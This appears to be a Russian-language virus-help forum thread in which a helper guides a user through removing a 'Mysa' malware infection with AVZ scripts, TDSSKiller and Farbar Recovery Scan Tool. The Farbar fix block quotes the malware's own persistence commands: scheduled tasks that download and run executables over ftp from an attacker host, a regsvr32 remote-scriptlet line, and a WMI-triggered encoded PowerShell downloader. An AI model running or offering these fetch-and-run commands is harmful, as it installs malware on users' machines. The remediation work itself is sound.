[РЕШЕНО] Как избавиться от процессов Mysa,1,2,3

[Матвей Ульченко 0]

Здравствуйте, сегодня 16 апреля 2019 года обнаружил данный процесс musa 1 2 3 на своем ПК. У вас на сайте прочёл что это вирус , помогите избавиться .

CollectionLog-2019.04.16-19.32.zip

Изменено 16 апреля, 2019 пользователем Матвей Ульченко

[Mark D. Pearlstone 1 704]

Порядок оформления запроса о помощи

[thyrex 1 468]

Выполните скрипт в AVZ из папки Autologger

begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;
QuarantineFile('C:\Windows\System32\wbiosrvp.dll','');
 QuarantineFile('C:\Windows\System32\themctrl.dll','');
 QuarantineFile('C:\Windows\debug\item.dat','');
 DeleteFile('C:\Windows\debug\item.dat','32');
 DeleteFile('C:\Windows\System32\themctrl.dll','64');
 DeleteFile('C:\Windows\System32\wbiosrvp.dll','64');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\wbiosrvp\Parameters','ServiceDll','x64');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\themctrl\Parameters','ServiceDll','x64');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start','x32');
 DeleteSchedulerTask('Mysa');
 DeleteSchedulerTask('Mysa1');
 DeleteSchedulerTask('Mysa2');
 DeleteSchedulerTask('Mysa3');
 DeleteSchedulerTask('ok');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RebootWindows(false);
end.

• Обратите внимание: будет выполнена перезагрузка компьютера.

Выполните скрипт в AVZ

begin
CreateQurantineArchive('c:\quarantine.zip');
end.

c:\quarantine.zip загрузите по ссылке https://virusinfo.info/upload_virus.php?tid=37678

Полученный после загрузки ответ сообщите здесь.

 

Пожалуйста, ЕЩЕ РАЗ запустите Autologger; прикрепите к следующему сообщению НОВЫЕ логи.

 

+ Сделайте лог TDSSkiller

[Матвей Ульченко 0]

Результат загрузки Файл сохранён как 190416_175013_quarantine_5cb615d522577.zip Размер файла 3216268 MD5 6f8284bbd4bd43016a01e2955b46e4e9

 

CollectionLog-2019.04.16-20.59.zip

TDSSKiller.3.1.0.28_16.04.2019_20.50.46_log.zip

[thyrex 1 468]

Выполните скрипт в AVZ из папки Autologger

begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;
 TerminateProcessByName('c:\windows\temp\conhost.exe');
 QuarantineFile('c:\windows\temp\conhost.exe','');
 TerminateProcessByName('C:\Windows\inf\lsmm.exe');
 QuarantineFile('C:\Windows\inf\lsmm.exe','');
 DeleteFile('C:\Windows\inf\lsmm.exe','32');
 DeleteFile('c:\windows\temp\conhost.exe','32');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start','x32');
 DeleteSchedulerTask('Mysa');
 DeleteSchedulerTask('Mysa1');
 DeleteSchedulerTask('Mysa2');
 DeleteSchedulerTask('Mysa3');
 DeleteSchedulerTask('ok');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RebootWindows(false);
end.

• Обратите внимание: будет выполнена перезагрузка компьютера.

Выполните скрипт в AVZ

begin
CreateQurantineArchive('c:\quarantine.zip');
end.

c:\quarantine.zip загрузите по ссылке https://virusinfo.info/upload_virus.php?tid=37678

Полученный после загрузки ответ сообщите здесь.

 

Пожалуйста, ЕЩЕ РАЗ запустите Autologger; прикрепите к следующему сообщению НОВЫЕ логи.

[Матвей Ульченко 0]

Результат загрузки Файл сохранён как 190416_181427_quarantine_5cb61b8331136.zip Размер файла 759337 MD5 283b7687575fabd6eb8921f107885b6a

 

 

CollectionLog-2019.04.16-21.17.zip

[thyrex 1 468]

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

• Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

2. Убедитесь, что в окне Optional Scan отмечены List BCD, Driver MD5 и 90 Days Files.

3. Нажмите кнопку Scan.

4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.

5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).

6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению.

[Матвей Ульченко 0]

Сделал 

Архив ZIP - WinRAR.zip

[thyrex 1 468]

1. Выделите следующий код:

Start::
CreateRestorePoint:
2019-02-19 12:39 - 2019-04-16 23:45 - 000000084 _____ () C:\Program Files\Common Files\xpdown.dat
2019-03-04 18:34 - 2019-04-16 23:44 - 000000080 _____ C:\Windows\system32\s
2019-03-04 18:34 - 2019-04-16 23:44 - 000000078 _____ C:\Windows\system32\ps
2019-03-04 18:34 - 2019-04-16 23:44 - 000000076 _____ C:\Windows\system32\p
2019-03-04 18:29 - 2019-04-16 23:45 - 000023552 _____ (Microsoft Corporation) C:\Windows\system\down.exe
2019-04-16 21:12 - 2019-04-16 23:46 - 000003518 _____ C:\Windows\System32\Tasks\Mysa
2019-04-16 21:12 - 2019-04-16 23:46 - 000003504 _____ C:\Windows\System32\Tasks\Mysa3
2019-04-16 21:12 - 2019-04-16 23:46 - 000003424 _____ C:\Windows\System32\Tasks\Mysa2
2019-04-16 21:12 - 2019-04-16 23:46 - 000003190 _____ C:\Windows\System32\Tasks\Mysa1
2019-04-16 21:12 - 2019-04-16 23:46 - 000003186 _____ C:\Windows\System32\Tasks\ok
HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.1226bye.xyz:280/v.sct scrobj.dll <==== ATTENTION
Task: {0C030FAE-3EC7-4DFD-97E4-5D01A9811954} - System32\Tasks\Mysa => cmd /c echo open ftp.1226bye.xyz>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION
Task: {77C89B29-5548-462B-86C0-052678BBF1F7} - \Microsoft\Windows\Windows Activation Technologies\ValidationTask -> No File <==== ATTENTION
Task: {83761A7F-A43C-4A8E-810B-0A1926E4AE1F} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: {BA0044BE-A915-4971-A0FD-BA9780C7E747} - \Microsoft\Windows\Windows Activation Technologies\ValidationTaskDeadline -> No File <==== ATTENTION
Task: {BFF224DA-CD77-47C4-B7CE-C2E419D825FC} - System32\Tasks\Mysa2 => cmd /c echo open ftp.1226bye.xyz>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
Task: {E8549826-1A31-4FFC-8F35-9AE02D93FD6C} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
Task: {EA71F1DC-3103-49E2-B251-6021B28BC8A1} - System32\Tasks\Mysa3 => cmd /c echo open ftp.1226bye.xyz>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckyoumm4\"",Filter="__EventFilter.Name=\"fuckyoumm3\":: <==== ATTENTION
WMI:subscription\__EventFilter->fuckyoumm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATTENTION
WMI:subscription\CommandLineEventConsumer->fuckyoumm4::[CommandLineTemplate => cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB (the data entry has 665 more characters).] <==== ATTENTION
Reboot:
End::

2. Скопируйте выделенный текст (правая кнопка мыши – Копировать).

3. Запустите Farbar Recovery Scan Tool.

4. Нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

• Обратите внимание: будет выполнена перезагрузка компьютера.

[Матвей Ульченко 0]

Сделал

Fixlog.zip

[thyrex 1 468]

Проблема решена?

[Матвей Ульченко 0]

Как видимо нет , открыл планировщик заданий  там ещё находятся процессы mysa,1,2,3  и ok  

скрин.zip

[thyrex 1 468]

Тогда еще раз сделайте лог TDSSkiller

[Матвей Ульченко 0]

Сделал

TDSSKiller.3.1.0.28_17.04.2019_20.55.10_log.zip

[thyrex 1 468]

А удалить буткит утилита разве не предлагает?